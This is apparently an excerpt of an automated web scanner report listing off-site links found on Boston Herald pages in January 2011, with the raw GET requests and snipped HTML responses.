   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1312557%26format%3Dcomments%26srvc%3Dtrack%26position%3D2&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(3) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Tracked Down: Deion Branch, Jarvis Green, Kevin Faulk and more...');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/151/team.aspx?id=151" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=sportsnetwork&page=nfl/teams/077/playeraaa.aspx?id=3655,team=077" >stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/playeraaa.aspx?id=691,team=077" >stats</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983261,5,0);" ><img id="thumb_up_1983261" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983261,1,0);"><img id="thumb_down_1983261" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983261, 'bcc');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&format=comments&cnum=1&at_comment=1983261#cnum1983261"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983261','/track/inside_track/view.bg?articleid=1312557&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983466,5,0);" ><img id="thumb_up_1983466" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983466,1,0);"><img id="thumb_down_1983466" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983466, 'MicailaCP');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&format=comments&cnum=1&at_comment=1983466#cnum1983466"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983466','/track/inside_track/view.bg?articleid=1312557&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1983559,5,0);" ><img id="thumb_up_1983559" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1983559,1,0);"><img id="thumb_down_1983559" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1983559, 'MumblesJr');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&format=comments&cnum=1&at_comment=1983559#cnum1983559"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1983559','/track/inside_track/view.bg?articleid=1312557&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312557&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(3) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/5e8b2b_ben_01282011.jpg" alt="Former Patriots defensive end Jarvis..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/track/inside_track/view/20110125at_least_brady_still_wins_the_hearts_of_gq/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/147606_brady_01252011.jpg" alt="At least Tom Brady still wins the hearts of GQ" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110119branch_uses_defeat_as_jet_fuel_for_2011/"><img src="http://multimedia.heraldinteractive.com/images/20110119/stp/996ec1_branch_01192011.jpg" alt="Deion Branch uses defeat as Jet fuel for 2011" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110119offense_points_to_future/"><img src="http://multimedia.heraldinteractive.com/images/20110119/stp/fdc6ad_wes_01192011.jpg" alt="Offense points to future" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.161. http://bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /track/inside_track/view.bg?articleid=1312550&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="The Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1312550%26position%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312550&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312550&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312550&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(3) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Moore&rsquo;s the merrier at Hasty festivities');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<p><object id="flashObj" width="440" height="294" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="@videoPlayer=767841466001&playerID=90384043001&playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwujoDnoZHHOVvr4yXqH2wi5E&domain=embed&dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="440" height="294" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312550&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(3) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
e="Click to open photo gallery: Hasty Pudding " onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4879','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4879','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/ed2891_012711hastynl05.JPG" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/track\\Hasty Pudding"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/track\\Hasty Pudding">Purchase Herald Photos</a>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg" alt="Snow business cancels Julianne Moore&rsquo;s Hasty Pudding outing" /></a>
...[SNIP]...
<a href="/track/inside_track/view/20110126this_is_hwoods_kind_of_town/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/d91058_Mark_01272011.jpg" alt="This is Hollywood&rsquo;s kind of &lsquo;Town&rsquo;" /></a>
...[SNIP]...
<a href="/entertainment/movies/general/view/20110126nominated_stars_share_their_oscar_moment/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/80ecf9_Firth_01262011.jpg" alt="Nominated stars share their Oscar moment" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.162. http://bostonherald.com/track/star_tracks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /track/star_tracks/?srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Star Tracks - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/star_tracks/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2F%3Forder%3DlastUpdate.desc&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
